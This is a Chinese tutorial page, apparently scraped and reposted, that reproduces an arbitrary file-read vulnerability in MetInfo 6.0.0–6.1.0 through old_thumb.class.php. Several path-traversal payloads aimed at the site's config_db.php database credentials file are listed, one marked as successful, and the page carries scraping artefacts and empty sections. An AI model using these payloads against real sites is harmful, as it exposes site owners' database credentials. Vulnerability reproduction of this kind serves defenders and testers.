PHP   发布时间:2022-04-04  发布网站:大佬教程  code.js-code.com
大佬教程收集整理的这篇文章主要介绍了metinfo_6.0_file-read大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。

目录

@H_294_36@meTinfo_6.0_file-read

漏洞描述

@H_374_0@meTinfo是一套使用PHPMysqL开发的内容管理系统。 MeTinfo 6.0.0~6.1.0版本中的 old_thumb.class.PHP文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件

漏洞危害等级

影响版本

@H_374_0@meTinfo 6.0.0
meTinfo 6.1.0

漏洞复现

基础环境

@H_616_63@ @H_871_66@meTinfoV6.0
组件 版本
OS 2008 R2 x64
WebServer PHPstudy
source Code

环境搭建

将源码拷贝到Windows2008中解压,

解压后访问网站,根据提示安装网站

安装完成后如下↓

metinfo_6.0_file-read

漏洞验证

payload

?dir=..././http/..././config/config_db.PHP

第一次绕过payload

?dir=.....///http/.....///config/config_db.PHP

第二次绕过payload

?dir=http/.....///.....///config/config_db.PHP

第三次绕过payload

?dir=http\..\..\config\config_db.PHP

metinfo_6.0_file-read

第三个payload成功读取到文件

漏洞修复

@L_142_41@meTinfo版本

大佬总结

以上是大佬教程为你收集整理的metinfo_6.0_file-read全部内容,希望文章能够帮你解决metinfo_6.0_file-read所遇到的程序开发问题。

如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。
标签: